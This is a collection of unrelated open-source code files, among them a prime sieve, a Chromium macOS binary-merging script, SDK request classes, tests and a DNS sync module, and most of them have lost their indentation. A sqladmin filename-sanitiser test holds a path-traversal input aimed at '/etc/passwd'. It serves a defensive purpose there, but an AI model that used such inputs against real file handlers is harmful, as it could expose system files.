"While the tool helps you in discovering clusters, it doesn't do labelling (yet). We do offer a [jupyter notebook](https://github.com/RasaHQ/rasalit/tree/master/notebooks/bulk-labelling) that might help out though."
)
|
Python/Algorithms/Sieve Algorithms/Sieve of Eratosthenes.py | m-payal/AlgorithmsAndDataStructure | 195 | 12771112 | <reponame>m-payal/AlgorithmsAndDataStructure<gh_stars>100-1000
"""
Sieve of Eratosthenes:
Generate all the primes up to a given integer n.
"""
from math import sqrt
def get_primes(n):
m = n + 1
# numbers = [True for i in range(m)]
numbers = [True] * m
for i in range(2, int(sqrt(n) + 1)):
if numbers[i]:
for j in range(i * i, m, i):
numbers[j] = False
primes = []
for i in range(2, m):
if numbers[i]:
primes.append(i)
return primes
print(get_primes(25))
|
atlas/workflow/scripts/convert_jgi2vamb_coverage.py | alienzj/atlas | 204 | 12771173 | <reponame>alienzj/atlas<filename>atlas/workflow/scripts/convert_jgi2vamb_coverage.py
#!/usr/bin/env python
import os
import sys
import re
def main(jgi_file):
# parsing input
header = {}
col2keep = ["contigName", "contigLen", "totalAvgDepth"]
with open(jgi_file) as inF:
for i, line in enumerate(inF):
line = line.rstrip().split("\t")
if i == 0:
header = {x: ii for ii, x in enumerate(line)}
col2keep += [x for x in line if x.endswith(".bam")]
print("\t".join(col2keep))
continue
elif line[0] == "":
continue
# contig ID
contig = line[header["contigName"]]
# collect per-sample info
out = []
for col in col2keep:
out.append(line[header[col]])
print("\t".join(out))
if __name__ == "__main__":
if "snakemake" in globals():
with open(snakemake.log[0], "w") as log:
sys.stderr = log
with open(snakemake.output[0], "w") as outf:
sys.stdout = outf
main(snakemake.input[0])
else:
import argparse
import logging
logging.basicConfig(format="%(asctime)s - %(message)s", level=logging.DEBUG)
class CustomFormatter(
argparse.ArgumentDefaultsHelpFormatter, argparse.RawDescriptionHelpFormatter
):
pass
desc = (
"Converting jgi_summarize_bam_contig_depths output to format used by VAMB"
)
epi = """DESCRIPTION:
Output format: contigName<tab>contigLen<tab>totalAvgDepth<tab>SAMPLE1.sort.bam<tab>Sample2.sort.bam<tab>...
Output written to STDOUT
"""
parser = argparse.ArgumentParser(
description=desc, epilog=epi, formatter_class=CustomFormatter
)
argparse.ArgumentDefaultsHelpFormatter
parser.add_argument(
"jgi_file",
metavar="jgi_file",
type=str,
help="jgi_summarize_bam_contig_depths output table",
)
parser.add_argument("--version", action="version", version="0.0.1")
args = parser.parse_args()
main(args.jgi_file)
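# Example invocation (added; not part of the original script). The converted
# table is written to STDOUT, so redirect it to a file:
#   python convert_jgi2vamb_coverage.py depths.txt > vamb_coverage.tsv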
|
tests/pipeline_runners/pipeline_runner_utils_test.py | elifesciences/sciencebeam | 272 | 12771207 | <gh_stars>100-1000
from unittest.mock import patch, MagicMock
import pytest
import sciencebeam.pipeline_runners.pipeline_runner_utils as pipeline_runner_utils_module
from sciencebeam.pipeline_runners.pipeline_runner_utils import (
get_remaining_file_list_for_args
)
BASE_TEST_PATH = '/tmp/test/conversion-pipeline'
BASE_DATA_PATH = BASE_TEST_PATH + '/data'
PDF_PATH = '*/*.pdf'
FILE_LIST_PATH = 'file-list.csv'
FILE_COLUMN = 'column1'
REL_PDF_FILE_WITHOUT_EXT_1 = '1/file'
PDF_FILE_1 = BASE_DATA_PATH + '/' + REL_PDF_FILE_WITHOUT_EXT_1 + '.pdf'
OUTPUT_PATH = BASE_TEST_PATH + '/out'
OUTPUT_SUFFIX = '.xml'
@pytest.fixture(name='load_file_list_mock', autouse=True)
def _load_file_list_mock():
with patch.object(pipeline_runner_utils_module, 'load_file_list') as mock:
yield mock
@pytest.fixture(name='find_matching_filenames_with_limit_mock', autouse=True)
def _find_matching_filenames_with_limit_mock():
with patch.object(pipeline_runner_utils_module, 'find_matching_filenames_with_limit') as mock:
yield mock
@pytest.fixture(name='map_file_list_to_file_exists_mock', autouse=True)
def _map_file_list_to_file_exists_mock():
with patch.object(pipeline_runner_utils_module, 'map_file_list_to_file_exists') as mock:
mock.side_effect = lambda file_list: [False] * len(file_list)
yield mock
@pytest.fixture(name='args')
def get_default_args():
opt = MagicMock()
opt.base_data_path = BASE_DATA_PATH
opt.output_path = OUTPUT_PATH
opt.output_suffix = OUTPUT_SUFFIX
opt.limit = None
return opt
@pytest.fixture(name='file_path_args')
def get_file_path_args(args):
opt = args
opt.source_path = PDF_PATH
opt.source_file_list = None
return opt
@pytest.fixture(name='file_list_args')
def get_file_list_args(args):
opt = args
opt.source_path = None
opt.source_file_list = BASE_DATA_PATH + '/file-list.tsv'
opt.source_file_column = 'url'
return opt
class TestGetRemainingFileListForArgs:
def test_should_pass_file_pattern_to_find_files(
self, file_path_args,
find_matching_filenames_with_limit_mock: MagicMock):
find_matching_filenames_with_limit_mock.return_value = [PDF_FILE_1]
assert (
get_remaining_file_list_for_args(file_path_args)
== find_matching_filenames_with_limit_mock.return_value
)
find_matching_filenames_with_limit_mock.assert_called_with(
BASE_DATA_PATH + '/' + PDF_PATH,
limit=file_path_args.limit
)
def test_should_pass_file_list_and_limit_to_load_file_list(
self, file_list_args,
load_file_list_mock: MagicMock):
opt = file_list_args
opt.limit = 100
load_file_list_mock.return_value = [PDF_FILE_1]
assert (
get_remaining_file_list_for_args(opt)
== load_file_list_mock.return_value
)
load_file_list_mock.assert_called_with(
opt.source_file_list, column=opt.source_file_column, limit=opt.limit
)
|
setup.py | asmiyusau/ShazamIO | 111 | 12771214 | import setuptools
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setuptools.setup(
name="shazamio",
version="0.0.5",
author="dotX12",
description="Is a FREE asynchronous library from reverse engineered Shazam API written in Python 3.6+ with asyncio and aiohttp. Includes all the methods that Shazam has, including searching for a song by file.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/dotX12/ShazamIO",
install_requires=['aiohttp', 'pydub', 'numpy', 'aiofiles', 'dataclass-factory',],
packages=setuptools.find_packages(),
python_requires='>=3.6',
)
|
chrome/installer/mac/universalizer.py | zealoussnow/chromium | 14,668 | 12771215 | #!/usr/bin/env python
# coding: utf-8
# Copyright 2020 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import errno
import filecmp
import os
import plistlib
import shutil
import stat
import subprocess
import sys
import time
def _stat_or_none(path, root):
"""Calls os.stat or os.lstat to obtain information about a path.
This program traverses parallel directory trees, which may have subtle
differences such as directory entries that are present in fewer than all
trees. It also operates on symbolic links directly, instead of on their
targets.
Args:
path: The path to call os.stat or os.lstat on.
root: True if called on the root of a tree to be merged, False
otherwise. See the discussion below.
Returns:
The return value of os.stat or os.lstat, or possibly None if the path
does not exist.
When root is True, indicating that path is at the root of one of these
trees, this permissiveness is disabled, as all roots are required to be
present. If one is absent, an exception will be raised. When root is True,
os.stat will be used, as this is the one case when it is desirable to
operate on a symbolic link’s target.
When root is False, os.lstat will be used to operate on symbolic links
directly, and a missing path will cause None to be returned.
"""
if root:
return os.stat(path)
try:
return os.lstat(path)
except OSError as e:
if e.errno == errno.ENOENT:
return None
raise
def _file_type_for_stat(st):
"""Returns a string indicating the type of directory entry in st.
Args:
st: The return value of os.stat or os.lstat.
Returns:
'symbolic link', 'file', or 'directory'.
"""
if stat.S_ISLNK(st.st_mode):
return 'symbolic_link'
if stat.S_ISREG(st.st_mode):
return 'file'
if stat.S_ISDIR(st.st_mode):
return 'directory'
    raise Exception('unknown file type for mode 0o%o' % st.st_mode)
def _sole_list_element(l, exception_message):
"""Assures that every element in a list is identical.
Args:
l: The list to consider.
exception_message: A message used to convey failure if every element in
l is not identical.
Returns:
The value of each identical element in the list.
"""
s = set(l)
if len(s) != 1:
raise Exception(exception_message)
return l[0]
def _read_plist(path):
"""Reads a macOS property list, API compatibility adapter."""
with open(path, 'rb') as file:
try:
# New API, available since Python 3.4.
return plistlib.load(file)
except AttributeError:
# Old API, available (but deprecated) until Python 3.9.
return plistlib.readPlist(file)
def _write_plist(value, path):
"""Writes a macOS property list, API compatibility adapter."""
with open(path, 'wb') as file:
try:
# New API, available since Python 3.4.
plistlib.dump(value, file)
except AttributeError:
# Old API, available (but deprecated) until Python 3.9.
plistlib.writePlist(value, file)
class CantMergeException(Exception):
"""Raised when differences exist between input files such that they cannot
be merged successfully.
"""
pass
def _merge_info_plists(input_paths, output_path):
"""Merges multiple macOS Info.plist files.
Args:
input_plists: A list of paths containing Info.plist files to be merged.
output_plist: The path of the merged Info.plist to create.
Raises:
CantMergeException if all input_paths could not successfully be merged
into output_path.
A small number of differences are tolerated in the input Info.plists. If a
key identifying the build environment (OS or toolchain) is different in any
of the inputs, it will be removed from the output. There are valid reasons
to produce builds for different architectures using different toolchains or
SDKs, and there is no way to rationalize these differences into a single
value.
If present, the Chrome KSChannelID family of keys are rationalized by using
“universal” to identify the architecture (compared to, for example,
“arm64”.)
"""
input_plists = [_read_plist(x) for x in input_paths]
output_plist = input_plists[0]
for index in range(1, len(input_plists)):
input_plist = input_plists[index]
for key in set(input_plist.keys()) | set(output_plist.keys()):
if input_plist.get(key, None) == output_plist.get(key, None):
continue
if key in ('BuildMachineOSBuild', 'DTCompiler', 'DTPlatformBuild',
'DTPlatformName', 'DTPlatformVersion', 'DTSDKBuild',
'DTSDKName', 'DTXcode', 'DTXcodeBuild'):
if key in input_plist:
del input_plist[key]
if key in output_plist:
del output_plist[key]
elif key == 'KSChannelID' or key.startswith('KSChannelID-'):
# These keys are Chrome-specific, where it’s only present in the
# outer browser .app’s Info.plist.
#
# Ensure that the values match the expected format as a
# prerequisite to what follows.
key_tail = key[len('KSChannelID'):]
input_value = input_plist.get(key, '')
output_value = output_plist.get(key, '')
assert input_value.endswith(key_tail)
assert output_value.endswith(key_tail)
# Find the longest common trailing sequence of hyphen-separated
# elements, and use that as the trailing sequence of the new
# value.
input_parts = reversed(input_value.split('-'))
output_parts = output_value.split('-')
output_parts.reverse()
new_parts = []
for input_part, output_part in zip(input_parts, output_parts):
if input_part == output_part:
new_parts.append(output_part)
else:
break
# Prepend “universal” to the entire value if it’s not already
# there.
if len(new_parts) == 0 or new_parts[-1] != 'universal':
new_parts.append('universal')
output_plist[key] = '-'.join(reversed(new_parts))
assert output_plist[key] != ''
else:
raise CantMergeException(input_paths[index], output_path)
_write_plist(output_plist, output_path)
def _universalize(input_paths, output_path, root):
"""Merges multiple trees into a “universal” tree.
This function provides the recursive internal implementation for
universalize.
Args:
input_paths: The input directory trees to be merged.
output_path: The merged tree to produce.
root: True if operating at the root of the input and output trees.
"""
input_stats = [_stat_or_none(x, root) for x in input_paths]
for index in range(len(input_paths) - 1, -1, -1):
if input_stats[index] is None:
del input_paths[index]
del input_stats[index]
input_types = [_file_type_for_stat(x) for x in input_stats]
type = _sole_list_element(
input_types,
'varying types %r for input paths %r' % (input_types, input_paths))
if type == 'file':
identical = True
for index in range(1, len(input_paths)):
if not filecmp.cmp(input_paths[0], input_paths[index]):
identical = False
        if identical:
            # All inputs are byte-for-byte identical; just copy one of them.
            shutil.copyfile(input_paths[0], output_path)
        elif (os.path.basename(output_path) == 'Info.plist' or
              os.path.basename(output_path).endswith('-Info.plist')):
            _merge_info_plists(input_paths, output_path)
        else:
            # Non-identical regular files that are not Info.plists are assumed
            # to be Mach-O binaries and are merged with lipo.
            command = ['lipo', '-create']
            command.extend(input_paths)
            command.extend(['-output', output_path])
            subprocess.check_call(command)
elif type == 'directory':
os.mkdir(output_path)
entries = set()
for input in input_paths:
entries.update(os.listdir(input))
for entry in entries:
input_entry_paths = [os.path.join(x, entry) for x in input_paths]
output_entry_path = os.path.join(output_path, entry)
_universalize(input_entry_paths, output_entry_path, False)
elif type == 'symbolic_link':
targets = [os.readlink(x) for x in input_paths]
target = _sole_list_element(
targets, 'varying symbolic link targets %r for input paths %r' %
(targets, input_paths))
os.symlink(target, output_path)
input_permissions = [stat.S_IMODE(x.st_mode) for x in input_stats]
permission = _sole_list_element(
input_permissions, 'varying permissions %r for input paths %r' %
(['0o%o' % x for x in input_permissions], input_paths))
os.lchmod(output_path, permission)
if type != 'file' or identical:
input_mtimes = [x.st_mtime for x in input_stats]
if len(set(input_mtimes)) == 1:
times = (time.time(), input_mtimes[0])
try:
# follow_symlinks is only available since Python 3.3.
os.utime(output_path, times, follow_symlinks=False)
except TypeError:
# If it’s a symbolic link and this version of Python isn’t able
# to set its timestamp, just leave it alone.
if type != 'symbolic_link':
os.utime(output_path, times)
elif type == 'directory':
# Always touch directories, in case a directory is a bundle, as a
# cue to LaunchServices to invalidate anything it may have cached
# about the bundle as it was being built.
os.utime(output_path, None)
def universalize(input_paths, output_path):
"""Merges multiple trees into a “universal” tree.
Args:
input_paths: The input directory trees to be merged.
output_path: The merged tree to produce.
input_paths are expected to be parallel directory trees. Each directory
entry at a given subpath in the input_paths, if present, must be identical
to all others when present, with these exceptions:
- Mach-O files that are not identical are merged using lipo.
- Info.plist files that are not identical are merged by _merge_info_plists.
"""
rmtree_on_error = not os.path.exists(output_path)
try:
return _universalize(input_paths, output_path, True)
except:
if rmtree_on_error and os.path.exists(output_path):
shutil.rmtree(output_path)
raise
def main(args):
parser = argparse.ArgumentParser(
description='Merge multiple single-architecture directory trees into a '
'single universal tree.')
parser.add_argument(
'inputs',
nargs='+',
metavar='input',
help='An input directory tree to be merged. At least two inputs must '
'be provided.')
parser.add_argument('output', help='The merged directory tree to produce.')
parsed = parser.parse_args(args)
if len(parsed.inputs) < 2:
raise Exception('too few inputs')
universalize(parsed.inputs, parsed.output)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
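# Example invocation (added; not part of the original script); the paths below
# are placeholders for two single-architecture builds and the merged output:
#   python3 universalizer.py out/arm64/App.app out/x86_64/App.app out/universal/App.app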
|
test/test_teams.py | Galtozzy/basketball_reference_scraper | 191 | 12771233 | <filename>test/test_teams.py
import unittest
from basketball_reference_scraper.teams import get_roster, get_team_stats, get_opp_stats, get_roster_stats, get_team_misc
class TestTeams(unittest.TestCase):
def test_get_roster(self):
df = get_roster('GSW', 2019)
        curry_df = df[df['PLAYER']=='Stephen Curry']
self.assertEqual(len(curry_df), 1)
expected_columns = ['NUMBER', 'PLAYER', 'POS', 'HEIGHT', 'WEIGHT',
'BIRTH_DATE', 'NATIONALITY', 'EXPERIENCE', 'COLLEGE']
self.assertListEqual(list(df.columns), expected_columns)
def test_get_roster_on_missing_nationality(self):
df = get_roster('FTW', 1956)
expected_columns = ['NUMBER', 'PLAYER', 'POS', 'HEIGHT', 'WEIGHT',
'BIRTH_DATE', 'NATIONALITY', 'EXPERIENCE', 'COLLEGE']
self.assertListEqual(list(df.columns), expected_columns)
def get_team_stats(self):
series = get_team_stats('GSW', 2019)
expected_indices = ['G', 'MP', 'FG', 'FGA', 'FG%', '3P', '3PA', '3P%', '2P', '2PA', '2P%', 'FT', 'FTA', 'FT%', 'ORB', 'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS']
self.assertCountEqual(list(series.index), expected_indices)
def get_opp_stats(self):
series = get_opp_stats('GSW', 2019)
expected_indices = ['OPP_G', 'OPP_MP', 'OPP_FG', 'OPP_FGA', 'OPP_FG%', 'OPP_3P', 'OPP_3PA', 'OPP_3P%', 'OPP_2P', 'OPP_2PA', 'OPP_2P%', 'OPP_FT', 'OPP_FTA', 'OPP_FT%', 'OPP_ORB', 'OPP_DRB', 'OPP_TRB', 'OPP_AST', 'OPP_STL', 'OPP_BLK', 'OPP_TOV', 'OPP_PF', 'OPP_PTS']
self.assertCountEqual(list(series.index), expected_indices)
def test_get_roster_stats(self):
df = get_roster_stats('GSW', 2019)
expected_columns = ['PLAYER', 'POS', 'AGE', 'TEAM', 'G', 'GS', 'MP', 'FG', 'FGA', 'FG%', '3P', '3PA', '3P%', '2P', '2PA', '2P%', 'eFG%', 'FT', 'FTA', 'FT%', 'ORB', 'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS', 'SEASON']
self.assertCountEqual(list(df.columns), expected_columns)
def test_get_team_misc(self):
series = get_team_misc('GSW', 2019)
expected_indices = ['AGE', 'W', 'L', 'PW', 'PL', 'MOV', 'SOS', 'SRS', 'ORtg', 'DRtg', 'NRtg', 'PACE', 'FTr', '3PAr', 'TS%', 'eFG%', 'TOV%', 'ORB%', 'FT/FGA', 'eFG%', 'TOV%', 'DRB%', 'FT/FGA', 'ARENA', 'ATTENDANCE', 'ATTENDANCE/G', 'TEAM', 'SEASON']
self.assertCountEqual(list(series.index), expected_indices)
series = get_team_misc('CHO', 2019)
self.assertCountEqual(list(series.index), expected_indices)
series = get_team_misc('NOK', 2007)
self.assertCountEqual(list(series.index), expected_indices)
series = get_team_misc('TCB', 1951)
self.assertCountEqual(list(series.index), expected_indices)
if __name__ == '__main__':
unittest.main()
|
tests/test_helpers.py | baurt/sqladmin | 319 | 12771274 | from sqladmin.helpers import secure_filename
def test_secure_filename(monkeypatch):
assert secure_filename("My cool movie.mov") == "My_cool_movie.mov"
assert secure_filename("../../../etc/passwd") == "etc_passwd"
assert (
secure_filename("i contain cool \xfcml\xe4uts.txt")
== "i_contain_cool_umlauts.txt"
)
assert secure_filename("__filename__") == "filename"
assert secure_filename("foo$&^*)bar") == "foobar"
|
rasa_nlu/tokenizers/yaha_tokenizer.py | hetaomilk123/Rasa_NLU_Chi | 1,304 | 12771279 | # -*- coding: utf-8 -*-
"""
Created on Thu Nov 23 14:54:35 2017
@author: user
"""
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from typing import Any
from typing import Dict
from typing import List
from typing import Text
from rasa_nlu.config import RasaNLUConfig
from rasa_nlu.tokenizers import Tokenizer, Token
from rasa_nlu.components import Component
from rasa_nlu.training_data import Message
from rasa_nlu.training_data import TrainingData
import sys
from yaha import Cuttor
reload(sys)
sys.setdefaultencoding('utf-8')
class YahaTokenizer(Tokenizer, Component):
name = "tokenizer_yaha"
provides = ["tokens"]
cuttor = Cuttor()
def __init__(self):
pass
@classmethod
def required_packages(cls):
# type: () -> List[Text]
return ["yaha"]
def train(self, training_data, config, **kwargs):
# type: (TrainingData, RasaNLUConfig, **Any) -> None
if config['language'] != 'zh':
raise Exception("tokenizer_yaha is only used for Chinese. Check your configure json file.")
for example in training_data.training_examples:
example.set("tokens", self.tokenize(example.text))
def process(self, message, **kwargs):
# type: (Message, **Any) -> None
message.set("tokens", self.tokenize(message.text))
def tokenize(self, text):
# type: (Text) -> List[Token]
tokenized = self.cuttor.tokenize(text.decode('utf-8'), search=True)
tokens = [Token(word, start) for (word, start, end) in tokenized]
return tokens
|
alipay/aop/api/response/AlipayOpenServicemarketCommodityQueryResponse.py | snowxmas/alipay-sdk-python-all | 213 | 12771297 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayOpenServicemarketCommodityQueryResponse(AlipayResponse):
def __init__(self):
super(AlipayOpenServicemarketCommodityQueryResponse, self).__init__()
self._app_hot_logo = None
self._audit_memo = None
self._authorization_file = None
self._biz_type_code = None
self._category_code = None
self._category_id = None
self._commodity_affiliation = None
self._commodity_id = None
self._contactor = None
self._create_date = None
self._log_url = None
self._mobile_visiturl = None
self._name = None
self._phone = None
self._status = None
self._sub_status = None
self._subtitle = None
self._test_detail = None
self._test_report = None
self._title = None
self._user_guide = None
self._user_id = None
@property
def app_hot_logo(self):
return self._app_hot_logo
@app_hot_logo.setter
def app_hot_logo(self, value):
self._app_hot_logo = value
@property
def audit_memo(self):
return self._audit_memo
@audit_memo.setter
def audit_memo(self, value):
self._audit_memo = value
@property
def authorization_file(self):
return self._authorization_file
@authorization_file.setter
def authorization_file(self, value):
self._authorization_file = value
@property
def biz_type_code(self):
return self._biz_type_code
@biz_type_code.setter
def biz_type_code(self, value):
self._biz_type_code = value
@property
def category_code(self):
return self._category_code
@category_code.setter
def category_code(self, value):
self._category_code = value
@property
def category_id(self):
return self._category_id
@category_id.setter
def category_id(self, value):
self._category_id = value
@property
def commodity_affiliation(self):
return self._commodity_affiliation
@commodity_affiliation.setter
def commodity_affiliation(self, value):
self._commodity_affiliation = value
@property
def commodity_id(self):
return self._commodity_id
@commodity_id.setter
def commodity_id(self, value):
self._commodity_id = value
@property
def contactor(self):
return self._contactor
@contactor.setter
def contactor(self, value):
self._contactor = value
@property
def create_date(self):
return self._create_date
@create_date.setter
def create_date(self, value):
self._create_date = value
@property
def log_url(self):
return self._log_url
@log_url.setter
def log_url(self, value):
self._log_url = value
@property
def mobile_visiturl(self):
return self._mobile_visiturl
@mobile_visiturl.setter
def mobile_visiturl(self, value):
self._mobile_visiturl = value
@property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
@property
def phone(self):
return self._phone
@phone.setter
def phone(self, value):
self._phone = value
@property
def status(self):
return self._status
@status.setter
def status(self, value):
self._status = value
@property
def sub_status(self):
return self._sub_status
@sub_status.setter
def sub_status(self, value):
self._sub_status = value
@property
def subtitle(self):
return self._subtitle
@subtitle.setter
def subtitle(self, value):
self._subtitle = value
@property
def test_detail(self):
return self._test_detail
@test_detail.setter
def test_detail(self, value):
self._test_detail = value
@property
def test_report(self):
return self._test_report
@test_report.setter
def test_report(self, value):
self._test_report = value
@property
def title(self):
return self._title
@title.setter
def title(self, value):
self._title = value
@property
def user_guide(self):
return self._user_guide
@user_guide.setter
def user_guide(self, value):
self._user_guide = value
@property
def user_id(self):
return self._user_id
@user_id.setter
def user_id(self, value):
self._user_id = value
def parse_response_content(self, response_content):
response = super(AlipayOpenServicemarketCommodityQueryResponse, self).parse_response_content(response_content)
if 'app_hot_logo' in response:
self.app_hot_logo = response['app_hot_logo']
if 'audit_memo' in response:
self.audit_memo = response['audit_memo']
if 'authorization_file' in response:
self.authorization_file = response['authorization_file']
if 'biz_type_code' in response:
self.biz_type_code = response['biz_type_code']
if 'category_code' in response:
self.category_code = response['category_code']
if 'category_id' in response:
self.category_id = response['category_id']
if 'commodity_affiliation' in response:
self.commodity_affiliation = response['commodity_affiliation']
if 'commodity_id' in response:
self.commodity_id = response['commodity_id']
if 'contactor' in response:
self.contactor = response['contactor']
if 'create_date' in response:
self.create_date = response['create_date']
if 'log_url' in response:
self.log_url = response['log_url']
if 'mobile_visiturl' in response:
self.mobile_visiturl = response['mobile_visiturl']
if 'name' in response:
self.name = response['name']
if 'phone' in response:
self.phone = response['phone']
if 'status' in response:
self.status = response['status']
if 'sub_status' in response:
self.sub_status = response['sub_status']
if 'subtitle' in response:
self.subtitle = response['subtitle']
if 'test_detail' in response:
self.test_detail = response['test_detail']
if 'test_report' in response:
self.test_report = response['test_report']
if 'title' in response:
self.title = response['title']
if 'user_guide' in response:
self.user_guide = response['user_guide']
if 'user_id' in response:
self.user_id = response['user_id']
|
aliyun-python-sdk-videoenhan/aliyunsdkvideoenhan/request/v20200320/ChangeVideoSizeRequest.py | yndu13/aliyun-openapi-python-sdk | 1,001 | 12771354 | <filename>aliyun-python-sdk-videoenhan/aliyunsdkvideoenhan/request/v20200320/ChangeVideoSizeRequest.py<gh_stars>1000+
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkvideoenhan.endpoint import endpoint_data
class ChangeVideoSizeRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'videoenhan', '2020-03-20', 'ChangeVideoSize','videoenhan')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_Height(self):
return self.get_body_params().get('Height')
def set_Height(self,Height):
self.add_body_params('Height', Height)
def get_B(self):
return self.get_body_params().get('B')
def set_B(self,B):
self.add_body_params('B', B)
def get_FillType(self):
return self.get_body_params().get('FillType')
def set_FillType(self,FillType):
self.add_body_params('FillType', FillType)
def get_G(self):
return self.get_body_params().get('G')
def set_G(self,G):
self.add_body_params('G', G)
def get_CropType(self):
return self.get_body_params().get('CropType')
def set_CropType(self,CropType):
self.add_body_params('CropType', CropType)
def get_R(self):
return self.get_body_params().get('R')
def set_R(self,R):
self.add_body_params('R', R)
def get_VideoUrl(self):
return self.get_body_params().get('VideoUrl')
def set_VideoUrl(self,VideoUrl):
self.add_body_params('VideoUrl', VideoUrl)
def get_Width(self):
return self.get_body_params().get('Width')
def set_Width(self,Width):
self.add_body_params('Width', Width)
def get_Tightness(self):
return self.get_body_params().get('Tightness')
def set_Tightness(self,Tightness):
self.add_body_params('Tightness', Tightness) |
tests/r/test_bio_chemists.py | hajime9652/observations | 199 | 12771355 | <reponame>hajime9652/observations<gh_stars>100-1000
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.bio_chemists import bio_chemists
def test_bio_chemists():
"""Test module bio_chemists.py by downloading
bio_chemists.csv and testing shape of
extracted data has 915 rows and 6 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = bio_chemists(test_path)
try:
assert x_train.shape == (915, 6)
except:
shutil.rmtree(test_path)
    raise
|
addons/mendeley/views.py | gaybro8777/osf.io | 628 | 12771370 | # -*- coding: utf-8 -*-
from .provider import MendeleyCitationsProvider
from website.citations.views import GenericCitationViews
mendeley_views = GenericCitationViews('mendeley', MendeleyCitationsProvider)
|
tools/dns-sync/dns_sync/api.py | ruchirjain86/professional-services | 2,116 | 12771375 | # Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import threading
from google.cloud import datastore
from google.cloud import resource_manager
from googleapiclient import discovery
from googleapiclient import errors
import httplib2
from oauth2client import client
import webapp2
def resource_iterator(next_page_function):
"""Loop through resources from a Google API.
An iterator that returns all of the resources from a Google API 'list'
operation paging through each set.
Args:
next_page_function: A function that when called will return the next
page of results.
Yields:
        A list of resources, which are typically dictionaries.
"""
next_page_token = None
more_results = True
while more_results:
resource_response = None
try:
resource_response = next_page_function(next_page_token).execute()
except errors.HttpError:
# Some projects throw a 403. (compute engine isn't enabled)
# just ignore those resources.
logging.debug('skipping resources.', exc_info=True)
return
for items_field in ['items', 'rrsets', 'managedZones']:
items = resource_response.get(items_field, {})
if items and (type(items) == dict):
for item in items.iteritems():
yield item
if items and (type(items) == list):
for item in items:
yield item
if 'nextPageToken' in resource_response:
next_page_token = resource_response['nextPageToken']
else:
more_results = False
class ThreadsafeClientLocal(object):
"""A thread local Google API client descriptor.
    Httplib2 is not threadsafe so each request thread requires its own
threadlocal client object which this creates.
Attributes:
service: String name of the API to create the client for.
version: String version of the API client.
"""
_class_thread_local = threading.local()
def __init__(self, service, version):
"""Create a thread local API client.
Will create the underlying httplib2.Http object on construction, but
the underlying API client is lazy constructed.
Args:
service: Name of API.
version: Version of the api.
"""
self.service = service
self.version = version
self.http = httplib2.Http(timeout=60)
self.cache_discovery = True
def __get__(self, instance, instance_type):
"""Construct the API client."""
if instance is None:
return self
thread_local = None
try:
app = webapp2.get_app()
# Python Google API clients aren't threadsafe as they use httplib2
# which isn't threadsafe.
thread_local = app.registry.get(self)
if thread_local is None:
thread_local = threading.local()
app.registry[self] = thread_local
except AssertionError:
# When not in a request context, use class thread local.
thread_local = ThreadsafeClientLocal._class_thread_local
cached_client = getattr(thread_local, 'api', None)
if cached_client is None:
credentials = client.GoogleCredentials.get_application_default()
if credentials.create_scoped_required():
credentials = credentials.create_scoped(
'https://www.googleapis.com/auth/cloud-platform')
cached_client = discovery.build(
self.service,
self.version,
http=credentials.authorize(self.http),
cache_discovery=self.cache_discovery)
thread_local.api = cached_client
return cached_client
class Clients(object):
"""Holds API clients.
For Google API clients, we use thread local descriptors which creates the
client on first access. The "google.cloud" clients are threadsafe and are
simple properties.
"""
metrics = ThreadsafeClientLocal('monitoring', 'v3')
compute = ThreadsafeClientLocal('compute', 'v1')
dns = ThreadsafeClientLocal('dns', 'v1')
iam = ThreadsafeClientLocal('cloudresourcemanager', 'v1')
def __init__(self):
self.datastore = datastore.Client()
self.crm = resource_manager.Client()
CLIENTS = Clients()
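# Illustrative usage sketch (added; not part of the original module): paging
# through Cloud DNS managed zones with resource_iterator. The project id is a
# placeholder and application-default credentials are required to run this.
#
#   for zone in resource_iterator(
#           lambda token: CLIENTS.dns.managedZones().list(
#               project='my-project', pageToken=token)):
#       print(zone['name'])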
|